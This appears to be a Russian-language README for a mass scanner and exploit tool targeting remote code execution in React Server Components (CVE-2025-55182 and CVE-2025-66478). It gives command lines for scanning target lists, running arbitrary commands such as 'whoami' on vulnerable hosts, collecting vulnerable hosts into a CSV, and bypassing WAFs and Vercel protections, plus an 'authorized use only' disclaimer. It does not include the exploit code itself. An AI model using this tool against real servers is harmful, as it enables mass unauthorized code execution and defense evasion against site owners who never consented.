
Массовый поиск и эксплуатация PoC для CVE-2025-55182 & CVE-2025-66478
Мощный многопоточный сканер и эксплойт для уязвимостей React Server Component (RSC). Этот инструмент предназначен для выявления и эксплуатации уязвимостей RCE в реализациях RSC, поддерживая различные методы обхода и стратегии.
Примечание: Из-за огромной сложности поддержки полноценной интерактивной оболочки и других тяжелых функций мы решили удалить их. Теперь этот проект сосредоточен исключительно на обработке граничных случаев, поведенческом анализе и надежном обнаружении уязвимостей RSC. Мы считаем, что более простой и сфокусированный инструмент лучше служит сообществу.
pip install requests
Сканирование одного URL для проверки на уязвимости.
python3 rschunter.py -u https://example.com
Сканирование списка URL из файла (по одному URL на строку).
python3 rschunter.py -l targets.txt
Выполнение определенной команды на уязвимых целях (по умолчанию id).
python3 rschunter.py -u https://example.com -c "whoami"
Сохранение списка уязвимых хостов в CSV файл.
python3 rschunter.py -l targets.txt --save vulnerable.csv
Включение инъекции мусорных данных для обхода WAF.
python3 rschunter.py -u https://example.com --waf-bypass
Включение стратегии обхода, специфичной для Vercel.
python3 rschunter.py -u https://example.com --vercel
Маршрутизация трафика через прокси (полезно для отладки с Burp Suite).
python3 rschunter.py -u https://example.com --proxy http://127.0.0.1:8080
Этот инструмент предназначен только для образовательных и авторизованных целей тестирования. Использование этого инструмента для атаки на цели без предварительного взаимного согласия незаконно. Разработчики не несут ответственности за любое неправомерное использование или ущерб, причиненный этой программой.
| Аргумент | Описание |
|---|
-u, --url | Целевой URL для сканирования. |
-l, --list | Путь к файлу со списком целей. |
-c, --cmd | Команда для выполнения (по умолчанию: id). |
-t, --threads | Количество одновременных потоков (по умолчанию: 10). |
--check | Безопасный режим: Проверка уязвимости без выполнения пользовательских команд. |
--waf-bypass-size | Размер мусорных данных в КБ (по умолчанию: 128). |
-v, --verbose | Включение подробного вывода для отладки. |